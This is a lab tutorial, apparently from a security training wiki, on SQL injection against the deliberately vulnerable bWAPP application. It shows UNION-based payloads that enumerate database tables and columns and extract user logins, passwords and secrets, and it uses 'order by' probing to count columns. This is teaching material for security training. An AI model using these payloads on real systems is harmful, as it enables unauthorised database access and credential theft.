> For the complete documentation index, see [llms.txt](https://infosecgirls.gitbook.io/infosecgirls-training/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://infosecgirls.gitbook.io/infosecgirls-training/appsec/web-application-pentesting/injection/time-based-sql-injection.md).

# SQL Injection with bWAPP

## URL  - [`http://192.168.31.112:8086`](http://192.168.31.112:8086)

Go to SQL Injection (GET/Search)

![](/files/-MJsSjjs6gB2KkX6JJU6)

Lets put `'` see what happens

![](/files/-MJsRsnHyDpxGym09txv)

Lets try and use `' order by 6 -- -`

![](/files/-MJsSEH2X2T2F04XWO6X)

Lets check if we have any users table in bWAPP using the below code

```
' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -
```

![](/files/-MJsU3QNHwPOlHD1MRF9)

We can see user table exists, Lets try and find the users.

```
' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -

```

![](/files/-MJsUv6oXXbHSZhVkPzc)

Now we have all we need to retrieve all users secrets

```
' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -
```

![](/files/-MJsVISz-Yf6G2l7BgDr)

## SQL Injection (POST/Search)&#x20;

Add the below query to the URL&#x20;

Using this SQL query we can get all of table schema and names from information\_schema.tables.

```
' and 1 = 0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where 1=0 or 1=1-- '
```

![](/files/-MJsXh90s211ExkSRkd6)

Let's enter  table name to query to get columns names of table like "Heroes Table"

```
' and 1=0 union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'heroes' and table_schema = 'bwapp'-- '

```

![](/files/-MJsYELBT3xPaDWNTJoK)

## SQL Injection (AJAX/JSON/jQuery)

we can find columns with ‘order by’ command. query: `'order by 7 -- -`

![](/files/-MJsZ_vTMVyh1W8oe4Em)

Let check with `'order by 8 -- -`&#x20;

![](/files/-MJs_6gK5fMP1ztJCq1r)

On order by 8, it was not appearing anything, so we can assume that it has only 7 columns.
